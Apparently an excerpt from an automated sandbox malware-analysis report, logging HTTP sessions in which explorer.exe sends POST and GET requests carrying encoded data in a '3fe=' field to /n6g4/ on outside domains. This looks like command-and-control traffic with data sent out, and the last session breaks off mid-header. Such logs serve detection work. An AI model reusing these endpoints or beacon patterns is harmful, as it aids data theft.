                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.44979638.34.163.5980C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:40.130705118 CEST9353OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.uspplongee.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 409
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.uspplongee.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.uspplongee.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 58 47 30 4a 59 71 51 6e 50 58 6d 4f 6f 44 77 4e 56 54 49 49 67 38 72 48 33 5f 53 4e 6f 6e 45 4e 54 43 66 44 32 43 7e 74 33 74 77 59 73 59 56 75 33 39 67 4b 78 54 4a 58 56 39 7a 70 54 69 49 58 41 59 77 54 59 32 4d 76 6e 74 54 6c 33 50 4b 6d 6d 69 72 39 65 79 52 54 71 4e 68 49 66 39 74 6c 28 57 47 4d 41 56 53 59 32 2d 72 51 70 7a 43 30 69 57 34 67 57 79 30 64 6c 36 53 5a 76 46 5a 6a 58 47 46 32 66 4f 57 4d 4b 43 79 67 75 33 34 45 6b 42 35 64 70 43 38 6d 79 77 4d 6a 6c 6f 35 66 62 30 39 75 65 6f 4f 4e 45 2d 28 52 51 2d 5a 38 32 62 56 76 77 36 30 6b 7e 4b 34 73 7e 57 48 31 4d 75 53 79 79 66 37 6e 35 39 55 30 35 70 39 38 42 34 36 36 53 59 31 44 34 6b 43 4b 73 33 56 4c 69 4c 32 70 38 49 6a 44 4d 52 4a 37 36 41 35 4e 33 51 54 77 54 63 66 48 4c 71 54 35 63 43 6d 32 77 63 77 71 50 5f 4d 69 6f 6b 75 5a 78 77 51 48 32 79 62 32 32 2d 72 38 33 43 36 7a 43 65 73 55 6d 6c 49 48 7a 4c 79 30 39 38 6a 47 54 79 39 66 53 46 63 35 7a 50 72 4c 4e 55 66 4f 59 76 68 77 74 4e 4b 61 41 7a 34 32 6f 62 6c 53 5a 2d 33 58 42 75 4e 71 55 78 71 6d 4a 49 36 43 57 37 36 6c 37 6c 45 62 6d 6b 61 75 43 34 50 73 46 66 5a 68 6a 42 73 46 6d 57 6a 46 35 31 71 31 57 4a 4e 77 28 4f 4d 68 5a 53 74 64 38 48 77 63 28 37 72 4e 66 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.44979838.34.163.5980C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:40.300168991 CEST9371OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.uspplongee.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 36477
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.uspplongee.com
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://www.uspplongee.com/n6g4/
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Data Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54 74 65 38 57 75 68 70 6d 51 39 6d 6c 33 39 71 6a 66 74 59 56 73 58 30 51 67 32 43 58 28 6a 55 39 46 50 66 39 4c 51 49 63 75 50 77 64 52 67 48 49 39 69 65 35 78 48 77 72 28 42 41 4e 28 77 57 6c 5a 75 36 6b 6f 61 75 6f 28 77 68 62 5a 7a 6d 4d 6b 62 59 58 32 46 51 57 48 68 64 2d 54 79 68 31 41 4e 39 6b 71 53 7e 57 35 63 65 77 31 37 38 71 34 77 28 47 39 52 49 63 45 46 4b 38 63 45 31 61 32 6a 56 49 6e 5f 66 69 7e 35 77 45 58 79 64 74 43 42 7e 4b 51 6b 4a 43 49 48 38 65 63 58 6a 77 65 41 62 30 57 31 64 54 4e 55 77 58 53 43 41 57 41 4b 4d 55 65 64 50 46 46 55 77 6e 49 4f 54 75 66 4f 33 4c 42 54 6c 72 4b 71 71 6e 6e 6d 55 34 37 33 61 52 36 5f 47 36 5a 71 4e 62 47 44 65 4c 36 64 55 4f 59 34 62 38 78 64 61 57 4e 4c 46 65 79 41 59 4b 42 58 69 31 4b 53 30 67 5a 4a 54 37 35 45 7e 68 47 6f 77 6c 6a 71 46 4d 38 62 67 67 6c 58 37 4e 39 48 70 6d 69 5f 6e 50 4c 32 72 41 74 48 32 59 44 67 62 4d 48 56 36 66 55 4b 4c 41 76 2d 49 5f 35 76 68 66 62 6e 4c 51 33 38 6d 44 78 73 65 6c 38 67 4b 33 49 4e 4e 52 6a 4d 65 69 55 64 33 4f 49 53 43 34 6b 62 4a 69 38 52 58 65 56 71 6b 2d 51 63 50 33 70 45 42 73 69 47 4d 30 49 4b 4e 4b 53 51 39 42 65 6a 55 79 61 61 56 7a 61 33 44 5a 77 4b 45 61 32 7a 36 33 78 47 76 2d 6b 62 42 33 42 4e 69 67 61 6b 49 56 30 6c 79 4d 66 41 5a 78 64 42 6b 76 4d 52 79 57 33 61 45 47 62 61 57 4a 56 2d 43 38 44 47 5a 56 31 42 6e 58 78 44 79 65 62 59 31 50 54 54 6b 39 61 55 45 66 32 69 55 53 6e 5f 7e 66 68 74 6d 74 6e 72 67 76 43 58 6e 56 6e 45 64 6b 52 55 47 5f 38 33 65 71 66 47 47
                                                                                                      Data Ascii: 3fe=XG0JYrsxBGeb3j9bXhoHrtbJwJOC0SMSU2b27m252vgN74ghz-QCxXN-bvmgCT0UAY4xY2IvkuSi3oOcnH(ySyRv4dhRVpNI(Wy-AUrD1OXQoQq0zFA7Ii1Wtb(GwVdEXGdufO6MKyuguWIFw2Vagy8n~QNguIk5b0wBet2NFIXRRu58(I9g7q0hpa4t6WasMuOAybiQ5PI04Z99W_nHXLtt6gDYs3RmifX08JOYFENA~mMq3VjWS8fDAKStcCnXwcwQP_8ionOZxTYH0Sbx9uqWyC6oQugqmkghzLqK9OnGTiNfQkc4nfrNJUfVP_h1tNLPA3kmoIhSaObXMtlqWBqmHo6ADL2L7lcfmh2UBLjsFNRhkkYFrGjF2VriHpcg0NdOeEJ91Q5O(r6_KciTR84lb6E4jI(W43x6cs8hEtyEiwmichX0ijkc(07CFvL6KX0xxxUBU4vsyjosxUtHgHTzIb6RKHSUzpmRwflLIzAmbNQezkNwrtfXH-fUW6wiuksjWAWMcsOzxXDiGJFfZnxu0F3ZjPOK~aDyMvjKP64G7vEhJN7mMdFpU2v_uSda5nl4oMwIH_THZlkTuWpYuyzXRdTGmZTRt9GDqnage-3YTaigCrbCTzqBhDOmOiRK~MJaa1fsVnGzT87apSWMxZ0b(z0v1Dj5DltWE8nYGL~5fxNSNRbtmwt4C7LvfiWGZbdQabpuEQJbsW6cx3tJnWd0lT9xYvcF8SZGQbn8elaeo5cLy1g_COsVzuKRdWBsvG1hlk5OppR7MEsQKGicLwE5SbnsrpkBzhPhdTJpc97E~0ysIFPo9s2hOtMhskHku3f4FGvKrCFJ9ufYCYKykiG9IqPTte8WuhpmQ9ml39qjftYVsX0Qg2CX(jU9FPf9LQIcuPwdRgHI9ie5xHwr(BAN(wWlZu6koauo(whbZzmMkbYX2FQWHhd-Tyh1AN9kqS~W5cew178q4w(G9RIcEFK8cE1a2jVIn_fi~5wEXydtCB~KQkJCIH8ecXjweAb0W1dTNUwXSCAWAKMUedPFFUwnIOTufO3LBTlrKqqnnmU473aR6_G6ZqNbGDeL6dUOY4b8xdaWNLFeyAYKBXi1KS0gZJT75E~hGowljqFM8bgglX7N9Hpmi_nPL2rAtH2YDgbMHV6fUKLAv-I_5vhfbnLQ38mDxsel8gK3INNRjMeiUd3OISC4kbJi8RXeVqk-QcP3pEBsiGM0IKNKSQ9BejUyaaVza3DZwKEa2z63xGv-kbB3BNigakIV0lyMfAZxdBkvMRyW3aEGbaWJV-C8DGZV1BnXxDyebY1PTTk9aUEf2iUSn_~fhtmtnrgvCXnVnEdkRUG_83eqfGGonijOQXYQVD5eT-ITe-mGQt6QxnTQfHnFVaN_8gc_RpTMqCUNB9y9cHUY9sRh044PqyF8fbP1cWc3bbYZqRh7jD21lJX5VKeF73wwTkJqUyU3rWRD(FZ3VYYxV-OUDs8BC86LaWF7eRr7rIN8I5B54x(DrfbuO3~aAtOm0SBlHU1SPswnVBjiybXU(pbI2bXU4Ks2yT9A~7cM8-3H6fbg4FwHPd4s8GR70Jk7AqZlQxJ1rmU_meHSET8OsSF-rrExLvV9ELzmEyZOPe6si4njph23Ym8TyDezRq8rV5pY5cokIb4efPVsLIhqMQ(foGIX4bkvWHgu~lPlG3gOhtlzs42YGly1Z5cUzwWOdamtHY~U1LVT9XktVxzQUIr4RbVRynTYIe1U5jeaVifM~4H16WunXBOADqt6(Z9RN8Oyo9bG2ecRHQwWo0yVKygOXfc4E-5quExgUlnB8Vcy7ASrn3Y4vRg6KOYwsRcRLXUIHLCeL1WVhBtafH62b-VBHDcQOSkU2kyQRvfbfN6mtXYhCKzKk3LyIX5pMENhxSZD2Mpah8mrUVv6rYbg0T5yzPORIOgqJl8Py_SgQOsmOmAf8N1wk-luYvjI27chCZxnM5aDs368emdWoXzQ7nGYERtBJETRaW(0LJLVy7U3UqGaqDTZMcnp70PqxXYBYwBZMhqSUX2tfyDViIP0PbDjRuPR2owPXVR5LGxk9IoHFODMvdK3LB3-0ZKuNRSAjKlhBGum(eraOa60eH35Gm~jR8hpoGsSMb1gZ4xUuZHzKBLau-T4zFwJGQgekvqoDK90GLbkEnks2TtGgx5uZuNie_xCIWXKuoJQ3HK9j2BAnpuoK-QfzzUPyAqXON5_JLwuMFqQL5NxWXJcNfdm65ZPz3jMaKRuQxdOV4Z3Cl4Q1naqrLyWR4~cWqwY32ep1TCOeUpYoBjnstDjTDVCqvEjMyou16Z08FhOYIypV2YCyqmc~pbg~mD6TnTORjJkoRLtAIeR8_m_MX(j2Da6p4rXMJ2fdfdyD_E8bX(2lT380efiTQSEeA2BW7X9~yn1PHIQLNnSpyYabxoCM4DQvSGaMTNZa3ROJptIwjZANdLY8aJMEac7DFCI0viGuoOu3paXCchg~9FUpYONeC5FlhVksMk5JYLRZimeAQQKd9Rg1MOhD5tAwQswI3QFr4J2F398iDwKKAo0aro3PU3In9p3ZctUHu5urUhyGlfAYa4aq_kesyUc1rzs1KZBRcl-5-byNcGuXNauIIv8o_S8heo8CAafaFqxJ2MrgVgsbHpydTxR(Tfy7R3WY1~RMXhkS8~JsciaN8EkzI7WgoRhO5zNsPs11fu8LE(iqa5bpOs45HhL1YZjEOVfDz9Nt_Khv9CR6L7zGKSeBWvVJw0HtHlxz896FDgAb74IZr3wcHAXTrLvh2rT7OLgx9AaDcEzvWNnhW6-p_S8SOBfQGAHK6HLgYtBaYw5ivUnDjyazuovHfLMbVoMjIxATD9_6NefDo2hPje85lO3QnAkecmd99Ys3_bV2G84bWnLDrKazG2hufpXhg1YqHqkGELrF-OOi3stqb97fPlDRye0iW7Dm_tFs6OjDn3wIvmTUVcFeO9FWdBMD3QsECHNzKMFml~1QDWa16l1ToU_9ok-nM(WlaeipcFfZbGFB61qIODrjGLgDF7Njkt0gZOJILN_R1jO5666(TJZfedWi4J6bc6R9Pco0MAUHESztSS1QpXrhLeZCMMPs73Us0AussVn3RXgGL0WW1xX76~D0KW_7EPZrgHvjquznUnUNaC32QgbNkmCz1WFZmHfFVU73_UcCWx4VEHjsn4b74sxGrBKUgBhbMqFxUxeSK~GnVp8NeJKrJgKkgJa4bqfEzHZVN9h79eTNyye3SLYlKkAWRqfY4W0bSPdO1W9tfNiZpZ8d7uCBM~Y1gblOWXABofYz_5CO0pACALizt1cR5m7C_JW5SoV1ZxrznO7Qf0KFY1ec1DlT10-23Yot75RjcNoqpnOdmD7fxCSfD7E63uyd1uHoLrcemSiVmUeoifnvkR_(47o9yHMMAIx4LV8Px1J(Xc_6SkfhpnmafcX6VAWoxfjoQhZTckQbiIWjR5ANKynf3(jpLZz72PLRzcOb8Ls3rsbzt(9QrZf8aPVVgtJntwQVP17UkqVcecX1ErjtW0c1vwDd3oxGZY9twGKyyNWMRzKbO748KLeZ3ScSH(iaAiGWl3z3h4qQ6QorU4RPMmNfwFgFhAed3CXjnuDk62cu-5uQQDSmOKscN0JPqGtTOADtDYDdXnq3m(1x6EkPv85rI2WFtigfUPC59whC4yj8oac2DZIiHt_zDFgvsC4Gw0ECvhFsVHhtNBN8dG1rdk1Vy1ON1lurticjAf-(U~vVUELUWnD3fAAB0~fHymNb9tC7Bxv~yF_rZJoOlpMs0P9QBdqnJzCcoK7wHOcvkAVdXURz3aoIQ7c8oc9MeTOm14ngEyCBZiKKhU7cXShZTB67J7-rB7jG_1tnG0sYIDpK6kCbQBjStPniRMn91L6tUsvmV0qWq4s0QFZHNdaNOEvUyV5j3JqPIEBon8BIOzF85TAN_RTwlVole8AwRfuvsMVF_CxPs8QVKPMZ1bfdr(DuuwPU692hj38Ub1uQV9ZKzx6hei-qnM7dhZonE9lTP5EF3vklKwBCjAOtImYVX7d2p20MWdQZ57m32hQeDVVSuD3lS


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.44979938.34.163.5980C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:40.467758894 CEST9433OUTGET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1
                                                                                                      Host: www.uspplongee.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      May 14, 2022 15:30:40.679183006 CEST9435INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Sat, 14 May 2022 13:30:40 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Data Raw: 66 66 63 30 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 0a 0a 0a 3c 74 69 74 6c 65 3e e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 e3 80 82 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 72 65 73 73 2b 53 74 61 72 74 2b 32 50 25 37 43 4c 61 74 6f 3a 31 30 30 2c 31 30 30 69 2c 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 39 30 30 2c 39 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 3c 21 2d 2d 20 4c 69 67 68 74 62 6f 78 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 62 6f 78 32 2d 6d 61 73 74 65 72 2f 64 69 73 74 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 3c 21 2d 2d 20 4c 6f 61 64 65 72 73 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 61 73 73 65 74 73 2f 6c 6f 61 64 65 72 73 2e 63 73 73 2d 6d 61 73 74 65 72 2f 6c 6f 61 64 65 72 73 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3c 21 2d 2d 20 54 65 6d 70 6c 61 74 65 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 79 65 6c 6c 6f 77 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 74 69 74 6c 65 3d 22 79 65 6c 6c 6f 77 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 70 69 6e 6b 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 20 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 74 69 74 6c 65 3d 22 70 69 6e 6b 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 6f 72 61 6e 67 65 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 20 73 74 79 6c 65 73
                                                                                                      Data Ascii: ffc0<!DOCTYPE html><html lang="en" class="no-js"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="keywords" content="" /><meta name="description" content="" />... Fonts --><link href="https://fonts.googleapis.com/css?family=Press+Start+2P%7CLato:100,100i,300,300i,400,400i,700,700i,900,900i" rel="stylesheet">... Lightbox styles --><link href="/templates/yw/2362/assets/lightbox2-master/dist/css/lightbox.min.css" rel="stylesheet">... Loaders styles --><link href="/templates/yw/2362/assets/loaders.css-master/loaders.min.css" media="screen" rel="stylesheet" type="text/css">... Template styles --><link href="/templates/yw/2362/css/yellow.min.css" media="screen" rel="stylesheet" type="text/css" title="yellow"><link href="/templates/yw/2362/css/pink.min.css" media="screen" rel="alternate stylesheet" type="text/css" title="pink"><link href="/templates/yw/2362/css/orange.min.css" media="screen" rel="alternate styles


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.44977535.209.127.15580C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      May 14, 2022 15:30:16.643537998 CEST7600OUTPOST /n6g4/ HTTP/1.1
                                                                                                      Host: www.jamesreadtanusa.com
                                                                                                      Connection: close
                                                                                                      Content-Length: 36477
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.jamesreadtanusa.com
